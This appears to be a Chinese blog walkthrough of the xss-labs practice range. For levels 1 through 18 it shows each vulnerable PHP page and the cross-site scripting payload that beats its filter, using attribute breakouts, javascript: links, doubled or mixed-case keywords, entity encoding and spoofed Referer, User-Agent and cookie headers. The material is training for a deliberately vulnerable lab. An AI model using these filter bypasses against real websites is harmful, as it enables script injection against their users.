xsslabs通关

已于 2022-07-16 18:56:40 修改
阅读量633 收藏
点赞数 1
文章标签: xss javascript
于 2022-07-15 23:21:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61774705/article/details/125782086
版权

目录

level1

level2

level3 

level4

level5 

level6 

level7 

level8

level9

level10

level11 

level12

level13

​level14

level15

level16

level17

​level18

level1

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!"); 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

没有过滤直接name=<script>alert("xss");</script>。

level2

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

 传入

<script>alert("xss");</script>

出现在两个地方,但是没有执行,第一个地方使用了htmlspecialchars($str),第二个地方直接将变量值插入到了<input>标签的value属性值中,所以闭合第二个地方传入:

"><script>alert("xss");</script>

用">和前面的<input形成闭合,把传入的js代码形成新的标签, 传入之后代码成功执行: 

level3 

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
  
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

传入<script>alert("xss");</script>后:

 代码里面的<和>应该被换成了&lt和&gt。 两个地方都用了htmlspecialchars($str),它的作用是将特殊符号转换成HTML实体,就是HTML为了防止特殊符号,如 "<"等,html当成标签,所以我们不能使用构建新标签的方法了。

浏览器还有一些事件可以执行js代码,如onfocus,onblur,onclick,

1.onclick是在对象被鼠标点击或者选取时触发。

2.onfocus是在对象获得焦点(“焦点”大概是接受键

盘输入的意思)时触发,获得焦点可以通过点击鼠标或者用TAB键。

3.onblur 是失去焦点产生的事件,点击输入框然后点其他的地方才会触发。

,这里用哪一个都可以。传入

'onclick='javascript:alert(1)'

变为: 

也可以传入:

'onclick='javascript:alert(1)

变为: 

然后点击输入框就可以了。

level4

和level3 一样只是闭合变成双引号。传入:

"onclick='javascript:alert(1)'

变为: 

也可以: 

"onclick="javascript:alert(1)

 变为:

level5 

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
  
}
</script>
<title>欢迎来到level5</title>
</head>
<body>
<h1 align=center>欢迎来到level5</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level5.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>

把script和on变成了scr_ipt和o_n: 

$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

传入:

"onclick='javascript:alert(1)'

把on变成了o_n:

 不能用onclick,onfocus,onblur了,也不能用script标签那就用a标签。a标签定义超链接,用于从一个页面链接到另一个页面。a元素最重要的属性是 href 属性,它指定链接的目标herf。

<a href="url">链接文本</a>

传入:

"> <a href=javascript:alert(1)> xss </a>

然后点击超链接就行了。 

  

level6 

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level6.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>

关键代码: 

$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);

过滤了script,on ,src,data,href。但是没有过滤大小写,可以用hrEf绕过。因为标签对大小写不敏感。

"> <a hrEf=javascript:alert(1)> xss </a>

然后点击链接。

看一下<img>标签和data属性:

<img>标签:

熟悉html的人都会知道在<img>标签中引用图片会用到一个属性就是src。正常的引用图

片就是将待引用图片的地址赋值给src属性。但是在js中如果src属性的值不正常或者无法

访问到时就可以触发一个onerror事件来执行js代码。传入:

<img src=111 onerror=alert(1)>

Data在我看来就是对字符进行编码的一种设定,比如如果在实际情况中

javascript、script等关键字被过滤掉了之后,可以用如下语句进行尝试

data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=

这条语句
javascript:alert("xss") 或者 <script>alert("xss")</script> 的作用是一样的

level7 

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
  
}
</script>
<title>欢迎来到level7</title>
</head>
<body>
<h1 align=center>欢迎来到level7</h1>
<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level7.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>

 把下面这些字符串都变成了空,一次过滤。

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);

使用双写绕过:

" oonnclick="javascscriptript:alert(1)

 传入效果如下:

 level8

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
  
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src=level8.jpg></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

 过滤的如下关键字,而且把双引号换成了&quot这样就不能用双引号闭合了。

ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

 传入的给了href属性,题目也给我们建好了链接,所以我们对javascrip:alert(1)进行Unicode:编码,因为javascript支持unicode:

 传入:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

 然后变为:

 点击链接就行了。

 level9

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

在第8关的基础上面加了检查链接合不合法,通过查看有没有'http://',所以在上有关的基础上再后面加上http://就行了。但是http://要用注释//隔开,不然不能执行。

传入:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://

 level10

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
  
}
</script>
<title>欢迎来到level10</title>
</head>
<body>
<h1 align=center>欢迎来到level10</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level10.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

把<和>换成了空。

$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);

 3个隐藏的input但是t_sort可以传入让他显示出来。

$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">

传入:

&t_sort=" type="text" onclick="alert(1)

出现输入框点击就行了。 

 传入后代码如下:

level11 

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level12.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level11</title>
</head>
<body>
<h1 align=center>欢迎来到level11</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level11.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

 还是隐藏input,t_sort可以传参,<>变为空,对传入t_sort进行了转义,双引号被转义了,就无法闭合了。

$_SERVER["HTTP_REFERER"]可以获取当前链接的上一个连接的来源地址,即链接到当前页面的前一页面的 URL 地址。

$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">

获取的地址传入了t_ref中:

<input name="t_ref"  value="'.$str33.'" type="hidden">

我们可以伪造地址为:

" tepy="text" onclick="alert(1)

 发包:

然后点击输入框就行了。 

 变为:

 level12

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level13.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level12</title>
</head>
<body>
<h1 align=center>欢迎来到level12</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level12.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

只是换成了$str11=$_SERVER['HTTP_USER_AGENT']; 和11关一样的,就是改一下User Agent。

 

 level13

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 
}
</script>
<title>欢迎来到level13</title>
</head>
<body>
<h1 align=center>欢迎来到level13</h1>
<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level13.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

和上一关类似换成了cookie传入参数 

$str11=$_COOKIE["user"];
<input name="t_cook"  value="'.$str33.'" type="hidden">

level14

源码如下:

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>欢迎来到level14</title>
</head>
<body>
<h1 align=center>欢迎来到level14</h1>
<center><iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe></center><center>这关成功后不会自动跳转。成功者<a href=/xss/level15.php?src=1.gif>点我进level15</a></center>
</body>
</html>

 这关卡的iframe引用的地址打不开,我们自己写一个简单的放在本地服务器上,引用对应的URL就行,同时需要打开php_exif开关

参考:[靶场] XSS-Labs 14-20_3hex的博客-CSDN博客

上传一个文件显示exif信息我们可以通过把这些信息改为js代码。这里最好上传jpg文件因为jpg有exif属性。

 把<script>alert(1)</script>写入:

 

 成功弹窗:

 level15

源码如下:

<html ng-app>
<head>
        <meta charset="utf-8">
        <script src="angular.min.js"></script>
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level16.php?keyword=test"; 
}
</script>
<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关,自己想个办法走出去吧!</h1>
<p align=center><img src=level15.png></p>
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

这个需要使用angularJS,原地址无法使用,我们修改地址为:https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js 

 ng-include相当于php的include函数,所以我们包含一个有XSS漏洞的URL就可触发这里的XSS。

1.ng-include,如果单纯指定地址,必须要加引号。 

src='level1.php?name=<img src=1 onerror=alert(1)>'

level16

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
  
}
</script>
<title>欢迎来到level16</title>
</head>
<body>
<h1 align=center>欢迎来到level16</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>
</body>
</html>

script,/,空格的被换成&nbsp。 

$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);

传入:<img src=1 οnerrοr=alert(1)>空格被换成&nbsp识别不了,删了空格也识别不了,所以用%0a代替空格,%0a是换行的url编码。

传入:

keyword=<img%0asrc=1%0aonerror=alert(1)>

level17

源码如下:

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!"); 
}
</script>
<title>欢迎来到level17</title>
</head>
<body>
<h1 align=center>欢迎来到level17</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
<h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>
</body>
</html>

 这题是Flash XSS,但是我们用闭合属性也可以触发XSS。

传入:

arg01=a&arg02=b onmouseover=alert(1)

鼠标移动到flash上面就会触发、事件。 

level18

和17关一样。

T1M@
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
XSS-labs靶场通关笔记7-9
m0_65614852的博客
03-10 234
第七关 通过返回的html代码发线标签里的字母没了......也就是被过滤掉了,script是一个字母都没剩下啊; 在尝试上一关的payload; on也没了,那么我写两遍呢,再试试; 可以!构造本关payload: "oonnclick="alert() //双写绕过 注意双写时注意,不是<ssccrriipptt>不是这样的双写 ,<sscriptcript>这样才是对的 后台在检索你的上传的数据是会过滤你的关键字 on 或 script 只要.
xsslabs第九关
weixin_63750160的博客
03-04 382
显示我的链接并不合法。
xss-labs之level9、level10
最新发布
weixin_51520483的博客
05-28 264
它接受两个参数:要搜索的字符串(主字符串)和要查找的子串。如果找到子串,则函数返回子串在主字符串中首次出现的位置(从 0 开始计数);,但是并没有过滤HTML实体编码,所以我们还是使用编码绕过,但是传入的参数需要有‘http://’,所以在payload后面加上,并注释。发现有隐藏传参数t_link、t_history、t_sort,但input属性是hidden,所以需要修改为text属性。尝试了之前的payload,发现都不行,看源码发现多了个。发现并没有输入框,跳转链接,查看页面源码。
xss-labs-master;1-9关;内含靶场;更好了解xss
xiaochenhang的博客
08-22 506
alert(1)
XSS-labs靶场实战(四)——第9-11关
永远是少年
11-18 592
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS-labs靶场实战第9-11关。 一、第九关 二、第十关 三、第十一关
xss-labs/level9
m0_71299382的博客
11-29 309
xss-labs/level9
XSSlabs通关手册
04-25
XSSlabs通关手册详细介绍了如何利用和防止这类攻击。 在Level 1,我们了解到基础的XSS注入方式,即直接在URL参数中插入JavaScript代码,例如`<script>alert(1)</script>`。然而,这种直白的尝试通常会被服务器端的...
xss-lab通关教程
05-07
XSS(Cross-Site Scripting)实验室全通关教程是一份深度学习和实践XSS漏洞攻防的宝贵资源。XSS是一种常见的网络安全问题,它允许攻击者在用户浏览器中注入恶意脚本,从而窃取敏感信息、操纵用户行为或进行其他危害...
WebGoat通关详解.zip
03-22
"WebGoat通关详解.zip"这个压缩包文件很可能包含了一步步指导用户如何完成WebGoat所有挑战的详细教程。 在描述中提到的"webgoat通关"意味着这个资源将带领用户了解如何解决WebGoat中的各种安全问题,从基础到高级,...
XSS-9注入靶场闯关(小游戏)——第九关
qq_39330735的博客
02-04 583
XSS-9注入靶场闯关(小游戏)——第九关,绕过后台字符串过滤,找出过滤条件,夹带过滤条件进行Payload
XSS-Game level 9
热门推荐
wangyuxiang946的博客
07-08 1万+
xssgame9,XSS-Game第九关过滤的很严 , 使用编码绕过
光棍节程序员闯关秀_第九关解密内容
11-18
光棍节程序员闯关秀_第九关解密内容,中间的解题结果放在附件中,方便大家来对照。
XSSxss-labs-level9
Hugu
02-23 620
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
DAY18:Xss 靶场通关手册
qq_49433473的博客
07-30 1253
xss-labs 靶场通关手册,超详细
xssgame第九关至第十关
学习
10-08 2091
第九关 这一关,我发现无论我输入什么,都是不合法链接 另外,"和>都被过滤了 两项对比 只是少了一个http,就显示不合法链接,问题就出在 http:// 这个身上 所以我们要在输入的语句中添加http:// 比如javascript:alert('1')//http:// ...
XSS-labs靶场过关秘籍(level 9-12)
qq_45741871的博客
09-21 1348
xss-labs靶场过关秘籍
XSS-labs-level6详解
m0_49025459的博客
05-31 122
函数进行HTML字符编码,确保用户输入的关键字不会被解析为HTML代码,以防止跨站脚本攻击。函数进行字符串替换,将可能被利用进行跨站脚本攻击的字符串全部替换成无害的字符串。然后我们用大小写绕过的手法试一下。发现返回结果和第五关差不多。那我们使用第五关的语句试一下。那我们直接去看一手源代码。
XSS-labs通关
em.....
10-24 4211
XSS-labs通关 1.第一关 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三关 ​ ​ 用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看
xss-labs-master
qq_60905276的博客
12-26 1024
1. 没有限制,直接输入<script>alert(/xss/)</script> 2.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

T1M@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值